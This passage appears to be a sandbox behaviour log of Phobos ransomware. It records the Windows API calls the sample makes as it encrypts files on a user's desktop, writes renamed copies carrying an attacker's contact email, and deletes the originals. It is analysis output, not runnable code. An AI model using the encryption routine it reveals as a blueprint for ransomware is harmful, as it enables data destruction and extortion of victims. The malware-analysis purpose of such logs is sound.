pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.718] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.718] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.718] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.718] CloseHandle (hObject=0xb8) returned 1 [0195.718] CloseHandle (hObject=0xac) returned 1 [0195.718] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\desktop.ini")) returned 1 [0195.719] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6FTLsd.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6ftlsd.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.719] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=35149) returned 1 [0195.720] CloseHandle (hObject=0xac) returned 1 [0195.720] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6FTLsd.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6ftlsd.mp4")) returned 0x20 [0195.720] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6FTLsd.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6ftlsd.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6FTLsd.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6ftlsd.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.720] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.720] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6FTLsd.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6ftlsd.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.721] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.721] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.721] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x894d, lpOverlapped=0x0) returned 1 [0195.722] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8950, dwBufLen=0x8950 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x8950) returned 1 [0195.722] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x8950, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x8950, lpOverlapped=0x0) returned 1 [0195.723] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.723] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.724] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0195.724] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.724] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0195.724] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.724] CloseHandle (hObject=0xac) returned 1 [0195.724] CloseHandle (hObject=0xb8) returned 1 [0195.724] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6FTLsd.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6ftlsd.mp4")) returned 1 [0195.726] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7T-xab-pfacE8GgvXsB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7t-xab-pface8ggvxsb.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.727] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=101692) returned 1 [0195.727] CloseHandle (hObject=0xb8) returned 1 [0195.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7T-xab-pfacE8GgvXsB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7t-xab-pface8ggvxsb.avi")) returned 0x20 [0195.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7T-xab-pfacE8GgvXsB.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7t-xab-pface8ggvxsb.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.727] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7T-xab-pfacE8GgvXsB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7t-xab-pface8ggvxsb.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.727] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.727] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.728] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7T-xab-pfacE8GgvXsB.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7t-xab-pface8ggvxsb.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.729] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.729] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.729] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x18d3c, lpOverlapped=0x0) returned 1 [0195.730] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x18d40, dwBufLen=0x18d40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x18d40) returned 1 [0195.731] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x18d40, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x18d40, lpOverlapped=0x0) returned 1 [0195.734] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.734] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.734] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0195.734] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.734] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0195.734] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.734] CloseHandle (hObject=0xb8) returned 1 [0195.734] CloseHandle (hObject=0xac) returned 1 [0195.734] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7T-xab-pfacE8GgvXsB.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7t-xab-pface8ggvxsb.avi")) returned 1 [0195.736] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8ttYfcXFhbBhXnHHPoF.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8ttyfcxfhbbhxnhhpof.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.737] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2744) returned 1 [0195.737] CloseHandle (hObject=0xac) returned 1 [0195.737] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8ttYfcXFhbBhXnHHPoF.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8ttyfcxfhbbhxnhhpof.mp4")) returned 0x20 [0195.737] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8ttYfcXFhbBhXnHHPoF.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8ttyfcxfhbbhxnhhpof.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.737] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8ttYfcXFhbBhXnHHPoF.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8ttyfcxfhbbhxnhhpof.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.737] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.737] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.737] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8ttYfcXFhbBhXnHHPoF.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8ttyfcxfhbbhxnhhpof.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.738] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.738] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.738] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xab8, lpOverlapped=0x0) returned 1 [0195.739] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xac0, dwBufLen=0xac0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xac0) returned 1 [0195.739] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xac0, lpOverlapped=0x0) returned 1 [0195.740] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.740] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.740] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0195.740] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.740] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0195.740] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.740] CloseHandle (hObject=0xac) returned 1 [0195.741] CloseHandle (hObject=0xb8) returned 1 [0195.741] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8ttYfcXFhbBhXnHHPoF.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8ttyfcxfhbbhxnhhpof.mp4")) returned 1 [0195.742] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.742] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9deII5P0-trYkA_97dJ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9deii5p0-tryka_97dj.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.742] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=90915) returned 1 [0195.742] CloseHandle (hObject=0xb8) returned 1 [0195.743] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9deII5P0-trYkA_97dJ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9deii5p0-tryka_97dj.flv")) returned 0x20 [0195.743] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9deII5P0-trYkA_97dJ.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9deii5p0-tryka_97dj.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9deII5P0-trYkA_97dJ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9deii5p0-tryka_97dj.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.743] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.743] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9deII5P0-trYkA_97dJ.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9deii5p0-tryka_97dj.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.743] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.744] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.744] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x16323, lpOverlapped=0x0) returned 1 [0195.745] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16330, dwBufLen=0x16330 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16330) returned 1 [0195.746] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x16330, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x16330, lpOverlapped=0x0) returned 1 [0195.748] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.748] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.748] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0195.748] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.748] WriteFile (in: hFile=0xac, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0195.748] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.748] CloseHandle (hObject=0xb8) returned 1 [0195.748] CloseHandle (hObject=0xac) returned 1 [0195.751] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9deII5P0-trYkA_97dJ.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9deii5p0-tryka_97dj.flv")) returned 1 [0195.753] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\6wR9giuKFJAphjeEW.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\6wr9giukfjaphjeew.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.754] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=7586) returned 1 [0195.754] CloseHandle (hObject=0xac) returned 1 [0195.754] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\6wR9giuKFJAphjeEW.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\6wr9giukfjaphjeew.flv")) returned 0x20 [0195.754] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\6wR9giuKFJAphjeEW.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\6wr9giukfjaphjeew.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\6wR9giuKFJAphjeEW.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\6wr9giukfjaphjeew.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.754] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.754] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0195.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\6wR9giuKFJAphjeEW.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\6wr9giukfjaphjeew.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.755] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0195.756] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.756] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1da2, lpOverlapped=0x0) returned 1 [0195.757] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1db0, dwBufLen=0x1db0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1db0) returned 1 [0195.757] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1db0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1db0, lpOverlapped=0x0) returned 1 [0195.758] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0195.758] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0195.758] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0195.758] CryptDestroyKey (hKey=0xa32de8) returned 1 [0195.758] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0195.758] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.758] CloseHandle (hObject=0xac) returned 1 [0195.758] CloseHandle (hObject=0xb8) returned 1 [0195.759] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\6wR9giuKFJAphjeEW.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\6wr9giukfjaphjeew.flv")) returned 1 [0195.760] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0195.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\aB3Rdr.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d07wotkp4\\ab3rdr.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0195.761] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=23199) returned 1 [0195.761] CloseHandle (hObject=0xb8) returned 1 [0195.761] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D07wOtkP4\\aB3Rdr.docx" (normalized: 